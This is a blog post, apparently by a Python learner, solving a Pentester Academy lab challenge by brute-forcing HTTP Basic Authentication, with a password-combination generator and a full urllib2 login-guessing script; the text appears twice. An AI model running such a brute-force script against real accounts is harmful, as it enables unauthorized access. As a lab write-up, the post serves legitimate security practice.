Pentester Academy Basic Authentication Challenge 3 via Python
Since I am learning python here
is a try at solving a Basic Auth Brute Force challenge posted at Pentester
Academy:
http://pentesteracademylab.appspot.com/lab/webapp/basicauth
The challenge is Basic in difficulty level and already provides the usernames: nick or admin. The password is of 5 letters and consists of only a,s and d. So the problem can be divided into two parts:
1. Creating all the password combinations
Here is the recursive function that returns a list of all the 5 letter combinations of a,s and d:
def fun(a):
chars="asd"
l = len(a)
lenthPerWord = len(a[0])
if lenthPerWord == 5:
return a
c=[]
for i in range(0,l):
for j in chars:
c.append(j+a[i])
return fun(c)
c=['a','s','d']
2. Try to login with all the username and password combinations
For this part I used urllib2 – one of the most extensively used libraries for pen testing. Basic Authentication adds a header to the request which looks something like this:
Authorization: Basic YWRtaW46bXlwYXNz
What follows Basic is the Base 64 encoding of username and password in the format:
user:password
base64 module came in handy to encode the username and the passwords.
Now if you look at the submission URL for the form provided in the challenge, it is actually the same URL as the URL of the page of the challenge. So just sending a GET request would get you the same challenge page. To submit the form (with even no data) you will have to send a POST request. For this the following format of Request method had to be used:
request = urllib2.request(URL, data)
data can be an empty string but it has to be there to send a post request and hence invoke authentication. If the response is unauthorized (code 401) then we expect an IOError. Else the authentication went fine and we can display the credentials and quit.
So finally the whole code looks like the following:
import urllib2
import base64
import sys
def fun(a):
chars="asd"
l = len(a)
lenthPerWord = len(a[0])
if lenthPerWord == 5:
return a
c=[]
for i in range(0,l):
for j in chars:
c.append(j+a[i])
return fun(c)
c=['a','s','d']
listOfPass=fun(c)
for user in ["admin","nick"]:
for password in listOfPass:
r=urllib2.Request("http://pentesteracademylab.appspot.com/lab/webapp/basicauth","")
encoded=base64.encodestring(user+':'+password)[:-1]
r.add_header("Authorization","Basic "+encoded)
try:
handle=urllib2.urlopen(r)
print user+":"+password
sys.exit(1)
except IOError, e:
print str(e)+" for "+user+":"+password
Since this code runs sequentially and depends on network latency and server response time it would be great if multiple threads could be run in parallel.
http://pentesteracademylab.appspot.com/lab/webapp/basicauth
The challenge is Basic in difficulty level and already provides the usernames: nick or admin. The password is of 5 letters and consists of only a,s and d. So the problem can be divided into two parts:
1. Creating all the password combinations
Here is the recursive function that returns a list of all the 5 letter combinations of a,s and d:
def fun(a):
chars="asd"
l = len(a)
lenthPerWord = len(a[0])
if lenthPerWord == 5:
return a
c=[]
for i in range(0,l):
for j in chars:
c.append(j+a[i])
return fun(c)
c=['a','s','d']
2. Try to login with all the username and password combinations
For this part I used urllib2 – one of the most extensively used libraries for pen testing. Basic Authentication adds a header to the request which looks something like this:
Authorization: Basic YWRtaW46bXlwYXNz
What follows Basic is the Base 64 encoding of username and password in the format:
user:password
base64 module came in handy to encode the username and the passwords.
Now if you look at the submission URL for the form provided in the challenge, it is actually the same URL as the URL of the page of the challenge. So just sending a GET request would get you the same challenge page. To submit the form (with even no data) you will have to send a POST request. For this the following format of Request method had to be used:
request = urllib2.request(URL, data)
data can be an empty string but it has to be there to send a post request and hence invoke authentication. If the response is unauthorized (code 401) then we expect an IOError. Else the authentication went fine and we can display the credentials and quit.
So finally the whole code looks like the following:
import urllib2
import base64
import sys
def fun(a):
chars="asd"
l = len(a)
lenthPerWord = len(a[0])
if lenthPerWord == 5:
return a
c=[]
for i in range(0,l):
for j in chars:
c.append(j+a[i])
return fun(c)
c=['a','s','d']
listOfPass=fun(c)
for user in ["admin","nick"]:
for password in listOfPass:
r=urllib2.Request("http://pentesteracademylab.appspot.com/lab/webapp/basicauth","")
encoded=base64.encodestring(user+':'+password)[:-1]
r.add_header("Authorization","Basic "+encoded)
try:
handle=urllib2.urlopen(r)
print user+":"+password
sys.exit(1)
except IOError, e:
print str(e)+" for "+user+":"+password
Since this code runs sequentially and depends on network latency and server response time it would be great if multiple threads could be run in parallel.
Comments
Post a Comment